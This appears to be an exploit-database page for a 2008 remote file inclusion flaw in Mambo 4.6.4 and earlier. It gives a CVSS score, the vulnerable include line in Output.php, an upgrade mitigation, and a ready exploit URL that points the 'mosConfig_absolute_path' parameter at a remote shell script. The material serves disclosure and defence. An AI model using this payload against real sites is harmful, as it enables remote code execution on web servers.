header-logo
Suggest Exploit
vendor:
Mambo
by:
irk4z
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Mambo
Affected Version From: 4.6.4 and earlier
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mambo <= 4.6.4 Remote File Inclusion Vulnerability

Mambo version 4.6.4 and earlier is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'mosConfig_absolute_path' parameter of the '/includes/Cache/Lite/Output.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system in the context of the webserver process.

Mitigation:

Upgrade to the latest version of Mambo.
Source

Exploit-DB raw data:

.-----------------------------------------------------------------------------.
|  vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability                  |
|  download: http://mambo-foundation.org/                                     |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: all friends  ;)                                                   |
'-----------------------------------------------------------------------------'

# code:

 /includes/Cache/Lite/Output.php :
 1     <?php
 2
 3     /**
 4     * This class extends Cache_Lite and uses output buffering to get the data to cache.
 5     *
 6     * There are some examples in the 'docs/examples' file
 7     * Technical choices are described in the 'docs/technical' file
 8     *
 9     * @package Cache_Lite
10     * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $
11     * @author Fabien MARTY <fab@php.net>
12     */
13
14     require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');
   ...
   
^ no comment.. RFI in line 14..

# exploit:

 http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?

# milw0rm.com [2008-06-13]

Navigation

Suggest Exploit

Services By CQR